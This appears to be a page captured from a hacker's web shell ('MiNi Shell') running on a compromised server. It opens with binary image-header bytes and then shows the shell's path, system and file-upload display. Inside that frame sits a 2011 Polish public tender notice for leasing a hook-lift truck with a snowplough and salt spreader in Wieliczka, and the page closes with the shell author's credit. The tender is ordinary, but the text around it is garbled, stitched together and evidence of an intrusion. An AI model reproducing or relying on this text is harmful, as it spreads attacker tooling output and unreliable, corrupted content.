JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111018/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111018/272553-N-2011.html

<p class="kh_header"><b>Wieliczka: Dostawa w formie leasingu operacyjnego z opcją wykupu używanego samochodu ciężarowego (hakowca) zabudowanego nową piaskarką oraz nowym pługiem dla potrzeb Zakładu Gospodarki Komunalnej w Wieliczce Sp. z o.o.</b><br>
<b>Numer ogłoszenia: 272553 - 2011; data zamieszczenia: 18.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Komunalnej w Wieliczce sp. z o.o. , ul. Jedynaka 30, 32-020 Wieliczka, woj. małopolskie, tel. 012 2781442, faks 012 2782455.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Prawa Handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa w formie leasingu operacyjnego z opcją wykupu używanego samochodu ciężarowego (hakowca) zabudowanego nową piaskarką oraz nowym pługiem dla potrzeb Zakładu Gospodarki Komunalnej w Wieliczce Sp. z o.o..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest leasing operacyjny z opcją wykupu używanego samochodu ciężarowego (hakowca) zabudowanego nową piaskarką oraz nowym pługiem dla potrzeb Zakładu Gospodarki Komunalnej w Wieliczce Sp. z o.o.

3.1. Wymogi techniczne i formalne używanego samochodu ciężarowego /hakowca/, nowej piaskarki i nowego pługa.

A. Używany samochód ciężarowy:
1.Rok produkcji nie wcześniejszy niż 2005 
2.Silnik wysokoprężny /diesel/ zgodny z dyrektywami UE o mocy od 220 do 320 KM
3.Przebieg nie większy niż 350 000 km
4.Podwozie dwuosiowe
5.Kierownica fabrycznie montowana  po lewej stronie pojazdu
6.Napęd na tylna oś (4x2), tylna oś musi posiadać koła podwójne typu bliźniak
7.Manualna skrzynia biegów
8.ABS
9.Klimatyzacja
10.Ładowność  nie mniej niż 6 000,00 kg
11.Kabina dzienna
12.Masa własna nie więcej niż 6000,00 kg
13.Całkowita długość pojazdu nie więcej niż 6 000,00 mm
14.Pojazd w 100 % przygotowany do pracy, kompletny, sprawny technicznie zgodnie z przeznaczeniem użytkownika, stan techniczny w pełni przygotowany do użytkowania   (do pracy tj. pojazd musi być po wymianie oleju, filtrów, płynów eksploatacyjnych), samochód musi być bezwypadkowy, nie może posiadać żadnych miejsc korozji.
15.Koła R 22,5 cala. Opony nowe z bieżnikiem zimowym
16.Norma emisji spalin minimum EURO 3
17.Koło zapasowe pełnowymiarowe
18.Zamontowana, fabrycznie nowa czołownica z wyprowadzeniem elektrycznym
19.Przód - zawieszenie mechaniczne, tył - zawieszenie pneumatyczne
20.Blokada tylnego mostu
21.Tachograf  z ważną legalizacją
22.Zarejestrowany na terenie Polski
23.Halogeny
24.W tylnej ścianie kabiny szyba
25.Lusterka wsteczne 2 szt
26.Gwarancja min. 6 m-cy

Zabudowa:
B. Fabrycznie nowe urządzenie hakowe /rok produkcji 2011 /
1.Długość przewożonych kontenerów 3200 - 4000 mm
2.Nominalna moc załadunkowa min. 6 t
3.Teleskopowe ramię główne
4.Wysokość haka 1200 mm /regulowana/
5.Masa własna urządzenia do 1 000,00 kg
6.Sterowanie z wewnątrz pojazdu i z zewnątrz
7.Blokada hydrauliczna lub mechaniczna kontenera 
8.Regulacja siły na blokady kontenera
9.Siłownik blokady kontenera osłonięty, zabezpieczony przed uszkodzeniem
10.Aktualna, ważna rejestracja urządzenia hakowego w UDT
11.Urządzenie sterowane pneumatycznie
12.Serwis 24 h
13.Wyposażony w światła ostrzegawcze
14.Gwarancja min. 24 m-ce

C. Fabrycznie nowy pług śnieżny /rok produkcji 2011/
1.Szerokość pługa 2800-3000 mm
2.Szerokość robocza  2400-2700 mm
3.Płyta przednia standard dostosowana do montażu
4.Oświetlenie 24 V, światła obrysowe, lampy drogowe
5.Własne zasilanie
6.Praca pod kątem pozytywnym i negatywnym
7.Kąt nachylenia 30°
8.Siłowniki hydrauliczne podnoszenia /opuszczania oraz skrętu i docisku odkładnicy
9.Podpory magazynowe-2 szt
10.Odkładnica z tworzywa sztucznego lub blachy stalowej
11.Segmenty lemieszowe gumowe
12.Pulpit sterujący, sterowanie pługiem z kabiny kierowcy
13.Wysokość 90-100 cm
14.Gwarancja min. 24 m-ce

D. Fabrycznie nowa /rok produkcji 2011/ piaskarko-solarka przystosowana do montażu na samochodzie z urządzeniem hakowym 
1.Zasobnik oraz konstrukcja stalowa wykonana ze stali nierdzewnej pokryta powłoką lakierniczą lub ze stali z dwustopniowym zabezpieczeniem antykorozyjnym /podkładowa grubopowłokowa farba epoksydowa i poliuretanowa farba nawierzchniowa/ 
2.Rynna zasypowa  oraz talerz zasypujący wykonane ze stali nierdzewnej
3.Pozostałe części stalowe pokryte powłoka antykorozyjną
4.Pojemność  zasobnika piaskarki 3 - 4 m3
5.Napęd poprzez własny silnik
6.Regulowana wysokość mechanizmu talerza rozrzucającego materiał w zależności od rodzaju nośnika
7.Podawanie materiału na talerz rozrzucający systemem taśmy łańcuchowej lub ślimakowym wykonanym ze stali nierdzewnej 
8.Szerokość posypywania od 2 do 12 m
9.Regulacja parametrów posypywania
10.Czujnik braku materiału do posypywania.
11.Krata zabezpieczająca zasobnik piaskarki przed przedostaniem się dużych brył soli, kamieni i innych zanieczyszczeń
12.Elektroniczna zmiana szerokości i kierunku posypywania /asymetria/ sterowana z kabiny
13.Włączanie światła ostrzegawczego i roboczego z kabiny kierowcy
14.Serwis 24 h
15.Gwarancja min. 24 m-ce
16.Podpory magazynowe /do demontażu urządzenia/
17.Plandeka zabezpieczająca zasobnik
18.Pulpit sterujący, sterowanie z kabiny kierowcy /Załączanie i wyłączanie urządzenia, załączanie obrotów roboczych silnika, regulacja gęstości i szerokości posypywania/
19.Wyposażenie elektryczne zgodnie z obowiązującymi przepisami

E. Dokumentacja dla dostawy używanego samochodu ciężarowego, (hakowca) zabudowanego nową piaskarką oraz nowym pługiem.
1.Instrukcja obsługi samochodu w języku polskim
2.Książka pojazdu lub karta pojazdu
3.Książki gwarancyjne lub karty gwarancyjne dla samochodu, piaskarko-solarki i pługa
4.Zasady świadczenia usług gwarancyjnych oraz ich zakres
5.Wykaz punktów serwisowych
6.Świadectwo homologacji   z zapisem że silnik samochodu spełnia normy emisji spalin zgodnie z dyrektywami UE

F. Wyposażenie samochodu:
trójkąt ostrzegawczy
apteczka
podnośnik hydrauliczny o udźwigu min. 8 t
klucz do kół

3.2 Istotne postanowienia, które zostaną wprowadzone do umowy leasingu operacyjnego:
1. Przed podpisaniem protokołu przekazania Zamawiający zastrzega sobie prawo do przeprowadzenia oględzin zaoferowanego przez Wykonawcę zestawu tj. używanego samochodu ciężarowego z zamontowanym nowym urządzeniem hakowym, nowym pługiem i nową piaskarko-solarką, w trakcie których sprawdzone zostaną m. in. ich stan techniczny, sprawność oraz stan formalno-prawny. W przypadku gdy w trakcie oględzin Zamawiający stwierdzi rozbieżności pomiędzy treścią oferty, a zaoferowanym przedmiotem zamówienia Zamawiający zastrzega sobie prawo odstąpienia od zakupu w terminie do 14 dni od dnia, w którym stwierdzono rozbieżności.
2. Odbiór przedmiotu leasingu w siedzibie Zamawiającego Wieliczka ul. Jedynaka 30.
3. Okres leasingowania - 36 m-cy
4. Wstępna opłata leasingowa - 10 % ceny brutto zamówienia
5. Opłaty leasingowe (raty leasingowe) w ilości 36 rat leasingowych płatnych przez Zamawiającego  w równych wysokościach w terminie dziesięciu ostatnich dni miesiąca.
6.Opłata końcowa, wartość wykupu  - 2 % ceny brutto zamówienia
7. Zamawiający nie przewiduje wystąpienia żadnych  innych dodatkowych kosztów związanych z realizacją zamówienia.
8. Waluta leasingu - polski złoty, raty leasingowe oraz inne wartości stałe w okresie leasingowania
9. Kary umowne za przekroczenie terminu dostawy przedmiotu leasingu - 0,5 % wartości umowy brutto za każdy dzień zwłoki
10. Zamawiający zastrzega sobie prawo wyboru ubezpieczyciela, ponieważ sam będzie ponosił koszty ubezpieczenia oraz opłaty rejestracyjnej przedmiotu leasingu.
11. Po zapłaceniu przez Zamawiającego ostatniej raty leasingu, pod warunkiem uregulowania wszelkich zobowiązań wobec Wykonawcy z tytułu umowy leasingu, przedmiot leasingu przechodzi na własność Zamawiającego za 2% wartości ceny brutto przedmiotu leasingu - w terminie 30 dni po upływie  miesiąca, w którym uiszczono ostatnią ratę leasingu.
12. Pierwsza rata leasingu płatna przez Zamawiającego do końca grudnia 2011 r.
13. Wybrany Wykonawca przekaże Zamawiającemu przedmiot leasingu w ciągu 30 dni od dnia podpisania umowy leasingu.                                                                                                       14. Pozostałe warunki leasingu regulowane są przez wewnętrzny regulamin Leasingodawcy /o ile taki istnieje/ oraz postanowienia Kodeksu Cywilnego                                                                                                     15. Wykonawca dokona przeszkolenia dwóch kierowców w zakresie obsługi w siedzibie Zamawiającego.
16. Miejsce serwisowania w ramach udzielonej gwarancji: w siedzibie Zamawiającego. W przypadku serwisowania pojazdu w punkcie serwisowym Wykonawcy, Wykonawca ponosi całkowity koszt związany z transportem pojazdu do punktu serwisowego i z punktu serwisowego do siedziby Zamawiającego oraz naprawy w trakcie trwania gwarancji.
17. Dostawa/przekazanie przedmiotu leasingu zostanie potwierdzone przez Zamawiającego i Wykonawcę protokołem przekazania/odbioru.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.11.40.00-9, 34.14.44.40-4, 66.11.40.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi udokumentować, iż wykonał lub wykonuje należycie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedno zamówienie którego przedmiotem była dostawa w formie leasingu operacyjnego lub finansowego minimum jednego samochodu o wartości co najmniej 200 000,00 zł brutto.
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na podstawie złożonych przez Wykonawcę dokumentów i oświadczeń wymaganych postanowieniami SIWZ przy zastosowaniu formuły: złożył dokumenty potwierdzające spełnianie warunków/ nie złożył dokumentów potwierdzających spełniania warunków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowana dostawa, odpowiada wymaganiom określonym przez zamawiającego, zamawiający żąda szczegółowego opisu oferowanego przedmiotu zamówienia przez Wykonawcę potwierdzającego, iż spełnia one wszystkie żądane przez Zamawiającego parametry, które określone są w  zał. nr 8 do SIWZ. 
W tym celu należy wypełnić załącznik nr 8 do SIWZ (kolumny potwierdzenie spełnienia warunku wpisując tak lub nie i opisać parametr oferowany) oraz podać rok produkcji pojazdu i urządzeń, markę pojazdu i model urządzenia.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Karta tytułowa oferty - sporządzona według formularza stanowiącego Zał. nr 1 do SIWZ.
2. Oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 uPzp - sporządzone według formularza stanowiącego Zał. nr 2 do SIWZ.
3. Oświadczenie o udzieleniu  gwarancji na oferowany przedmiot zamówienia - sporządzony według formularza stanowiącego Zał. nr 7 do SIWZ.
4. Wskazanie tej części zamówienia, której wykonanie wykonawca zamierza powierzyć podwykonawcy - sporządzone według formularza stanowiącego Zał. nr 6 do SIWZ.
Wykonawca nie jest zobowiązany do składania dokumentu o którym mowa w pkt. 4. Niezłożenie załącznika nr 6 do oferty jest rozumiane przez Zamawiającego, że Wykonawca wykona zamówienie siłami własnymi i nie będzie powierzał podwykonawcy żadnej części zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy leasingu w stosunku do treści oferty w przypadku (art. 144 ust. 1 uPzp):
1.zmian nazwy, siedziby lub innych danych Wykonawcy,
2.prośby Wykonawcy o udział lub zmianę podwykonawców,
3.zmianę terminu wykonywania umowy wynikającą z przedłużających się procedur administracyjnych (np. związanych z zamówieniami publicznymi, pozyskiwaniem dodatkowych uzgodnień lub decyzji),
4.wszelkich zmian wynikających z konieczności dostosowania warunków już zawartej umowy do nowych uregulowań prawnych, w tym zmiana stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wieliczka.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarki Komunalnej w Wieliczce Sp. z o.o. Wieliczka, 32-020 Wieliczka ul. Słowackiego 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.10.2011 godzina 09:50, miejsce: Sekretariat Prezesa Zakładu Gospodarki Komunalnej w Wieliczce Sp. z o.o. Wieliczka, 32-020 Wieliczka ul. Słowackiego 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com